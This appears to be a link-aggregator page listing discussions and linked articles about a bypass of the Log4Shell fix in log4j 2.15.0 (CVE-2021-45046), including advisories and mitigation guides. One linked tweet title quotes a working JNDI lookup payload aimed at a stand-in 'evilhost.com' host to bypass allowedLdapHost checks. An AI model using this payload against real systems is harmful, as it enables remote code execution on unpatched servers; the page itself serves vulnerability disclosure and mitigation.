- Log4Shell Update: Full bypass found in log4j 2.15.0, enabling RCE again (CVSS score 3.7 -> 9.0) https://www.lunasec.io/docs/blog/log4j-zero-day-severity-of-cve-2021-45046-increased/ 144 comments programming
- Log4Shell Update: Full bypass found in log4j 2.15.0, enabling RCE again (with payload) https://www.lunasec.io/docs/blog/log4j-zero-day-severity-of-cve-2021-45046-increased/ 68 comments netsec
Linked pages
- Log4Shell: RCE 0-day exploit found in log4j, a popular Java logging package | LunaTrace https://www.lunasec.io/docs/blog/log4j-zero-day/ 1949 comments
- Log4j – Apache Log4j Security Vulnerabilities https://logging.apache.org/log4j/2.x/security.html 708 comments
- Guide: How To Detect and Mitigate the Log4Shell Vulnerability (CVE-2021-44228 & CVE-2021-45046) | LunaTrace https://www.lunasec.io/docs/blog/log4j-zero-day-mitigation-guide/ 12 comments
- Márcio Almeida on Twitter: "FIX: Here is a PoC in how to bypass allowedLdapHost and allowedClasses checks in Log4J 2.15.0. to achieve RCE: ${jndi:ldap://127.0.0.1#evilhost.com:1389/a} and to bypass allowedClasses just choose a name for a class in the JDK. Deserialization will occur as usual. #Log4Shell 1/n" / Twitter https://twitter.com/marcioalm/status/1471740771581652995 1 comment
- Understanding Log4Shell via Exploitation and Live Patching (CVE-2021-44228 + CVE-2021-45046) | LunaTrace https://www.lunasec.io/docs/blog/log4shell-live-patch-technical/ 1 comment
- CVE - CVE-2021-44228 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228 0 comments
- How to Automatically Mitigate Log4Shell via a Live Patch (CVE-2021-44228 + CVE-2021-45046) | LunaTrace https://www.lunasec.io/docs/blog/log4shell-live-patch/ 0 comments